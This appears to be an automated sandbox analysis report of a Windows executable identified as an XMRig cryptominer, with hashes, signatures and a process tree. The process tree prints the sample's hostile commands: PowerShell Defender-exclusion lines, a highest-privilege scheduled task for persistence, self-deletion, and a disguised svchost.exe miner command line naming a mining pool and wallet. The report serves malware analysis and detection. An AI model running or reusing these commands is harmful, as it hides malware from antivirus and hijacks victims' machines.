Analysis
-
max time kernel
2s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
07/01/2024, 19:32
Static task
static1
Behavioral task
behavioral1
Sample
a74f958d8c90388815a0d99c626446d6.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a74f958d8c90388815a0d99c626446d6.exe
Resource
win10v2004-20231222-en
General
-
Target
a74f958d8c90388815a0d99c626446d6.exe
-
Size
44KB
-
MD5
a74f958d8c90388815a0d99c626446d6
-
SHA1
54c322a0d348353864a54ff51fa50463c0a70b84
-
SHA256
cddfa93662e4f3700994f90cd77b01c73c0af4f9c0a37189bda792e580c238f0
-
SHA512
a0ac4e419196f2b7527f51357d24dbebfb7bd0e1cc94d469b76b1a22e2f1559b8d7443f951611cd43b12eb4b5a74d90bcb8af2e07fa9d767975ff333ac45b775
-
SSDEEP
768:J3Y7w8L/rCsYMf6aH4ohAdMTeo2aQO0+cwkv2wDfqtBz+bJr5ZKwLctwTF9mXs+:J3Y8WDYMfFYoCP2QkpwDfGWrmiAOF9U7
Malware Config
Signatures
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral1/memory/2012-203-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-205-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-206-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-208-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-209-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-210-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-211-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-214-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-216-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-207-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-204-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-220-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-222-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-224-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-223-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2012-221-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1108 schtasks.exe 2940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1468 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1684 wrote to memory of 2112 1684 a74f958d8c90388815a0d99c626446d6.exe 30 PID 1684 wrote to memory of 2112 1684 a74f958d8c90388815a0d99c626446d6.exe 30 PID 1684 wrote to memory of 2112 1684 a74f958d8c90388815a0d99c626446d6.exe 30 PID 2112 wrote to memory of 1468 2112 cmd.exe 29 PID 2112 wrote to memory of 1468 2112 cmd.exe 29 PID 2112 wrote to memory of 1468 2112 cmd.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\a74f958d8c90388815a0d99c626446d6.exe"C:\Users\Admin\AppData\Local\Temp\a74f958d8c90388815a0d99c626446d6.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵PID:2808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'3⤵PID:2584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\a74f958d8c90388815a0d99c626446d6.exe"2⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\a74f958d8c90388815a0d99c626446d6.exe"3⤵PID:2888
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit4⤵PID:2608
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'5⤵
- Creates scheduled task(s)
PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"4⤵PID:2556
-
-
C:\Windows\system32\services64.exe"C:\Windows\system32\services64.exe"4⤵PID:784
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"5⤵PID:2308
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'1⤵PID:1076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵PID:2144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:1620
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:2836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'2⤵PID:1980
-
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"1⤵PID:2472
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"2⤵PID:1088
-
C:\Windows\system32\services64.exe"C:\Windows\system32\services64.exe"3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit2⤵PID:1160
-
-
C:\Windows\System32\svchost.exeC:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.minexmr.com:443 --user=468Jw9UmMsCCpy63a8rXkDbVHYjLzryJTSf71XRAF1sFaF3ftY17qUrdvcveGFmNRjFdrNiqzc5NESGYvP56oHnbDypJ5Fc --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --tls2⤵PID:2012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵PID:2244
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1624
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'1⤵
- Creates scheduled task(s)
PID:1108
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:2800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'2⤵PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'2⤵PID:1528
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a0db99f7292a0fadb60ac84fd75c5af8
SHA193d9b7faab9faf76e80884164987d3cee11d3a4a
SHA2567c73cefcaf66815c4fdfa3834885a5ef9c05db58d7f691d5965911b2d1a4209c
SHA512c0ab9d4871126017200a5686cc6d6547003057eedb0796ff6187c4dca7438b11c321305b58bc87551b688a31e56a1a09cbdea5e4149f0ae46aedd1dc747a7e77
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5075cd5b90f2a595b095e66065c45a6cb
SHA18f439f309291293fc6ec10cd8902cdabe84342c6
SHA256dd083a1d284fbce424e398438939c892f64e3a4f56470a887ad6352d8cc6b826
SHA512dd424c7e0072085f22d2cf1edce33d9147de04a127927772abe76974e41fb201171e4405fb008207a17ae03eb393e968728d8f2f5575d78e4af4ce8708fb8c07
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QPLCUUF3XXO14JNY92OM.temp
Filesize7KB
MD589fee4cad35b8f90fb3f68eb3fa18d75
SHA17273a5b8492b1a66e7502d6585145c3572b3a71f
SHA2565927d0f3ce480178549a93fe05d490f4524bf5a17248f1ae94dbe220b5269a84
SHA5122abd7a6b42c250eaf6118bc52f2dd0eb302af336097488b92c261308da49c3dde7eae0cd9f25fe151d7b15d4503d49cfb0dcd18f27b6685a5e5c8bdf006e99e1
-
Filesize
8KB
MD58e5950961e17794e67fd32de9997e837
SHA1e037e00aa1e4d7dbf332a9f334c0084a66724436
SHA2561af4b430399ae4f1b7af074e623251794c70a525c6a02a9ac1855e1405a20775
SHA512dd041996b46f454d1045c2fa0f2859044e6ca14c488cc3450887e08e9e5534bcc993370fc4edf6b46cdd84c3d4f101aa5ea1d88432d3f807466d83cab8dfe12d
-
Filesize
38KB
MD5ac837af1798862408de5242aef4a1842
SHA1082e33bc1e28bea00fde3cb0b28779992564707e
SHA256d14e33dbe9e8f648b5d1d8796981d2a4be7e0af12e6924a2c8914b83f04e833d
SHA512d49dbd966d3d5e7290bd1ec4d18952b2993454745d81712db43ffe4723674523a7ab873be6a8754b2bef5ba80b2acb2a20ba168bb9484890908561d386714b22
-
Filesize
23KB
MD50d8e51904cfc8fdf0bcc0963f50f4d70
SHA1386095916cfaf6a13521ab6724b95892920beef8
SHA256166bf621b1da55e0babfd1e3aa23de8d18615baccb0af3da173d77024e8e1b93
SHA5126aa2066acc7dfcad61e249e107793d2fecb757a4cd9d5b890a5df33f221af42da901852377ad6216cf9dc7b648a81612b10e7ea7b012fd007e80a581ce08cadf
-
Filesize
38KB
MD56d420745135769a3025898c1c62dc4d1
SHA17faf48d7cd71662887c365295be916c424e752c3
SHA256d6a3c872b1a93b5e3f119a68f1c9df88a995966ee5977f6c63ddfe42f598cbc8
SHA5125f1b6c4ff66e0961cdbf054473667e5eb437e037289b95881d26508b22f552b41540401c36d936cdfde2bae011451ed4e169b198a3b3ed05f27f63b3cc069b37
-
Filesize
25KB
MD5a7eaa7f85e9f823ae87fb0a51f3cacac
SHA11900d76f2e73cdedecabdd19f4a0de66656285c5
SHA256b8b99ac9e85c8c0c06a0961714c61c180fc0502112d717e98ebca07fb7e259ef
SHA51262362c382c582bac1af2daa55723f89d3f3d18d411a63448c4459421844c9c3f9f971f80d120edb2da9ae13e8fb34c504f7e3f3d28f5262af0cd28220148ea7b
-
Filesize
44KB
MD5a74f958d8c90388815a0d99c626446d6
SHA154c322a0d348353864a54ff51fa50463c0a70b84
SHA256cddfa93662e4f3700994f90cd77b01c73c0af4f9c0a37189bda792e580c238f0
SHA512a0ac4e419196f2b7527f51357d24dbebfb7bd0e1cc94d469b76b1a22e2f1559b8d7443f951611cd43b12eb4b5a74d90bcb8af2e07fa9d767975ff333ac45b775
-
Filesize
37KB
MD55f6e0df94cceebcd7c51fda4dc8f72fb
SHA1492764475b3770b287d879a1c4d20866b0fac3be
SHA2565bf8e0f9c4be7bb2f36a55a09a2a026de1f37fcc5d23526f957b95d4c2ff3e12
SHA5126aad53058e0cef7466f03fbc292e7c91c94b594a146f0e41b56e8b09def956e9d12afca5b75633e47b7d06bb0f6e885f271443ec188e93c2a2e9105b68c24c13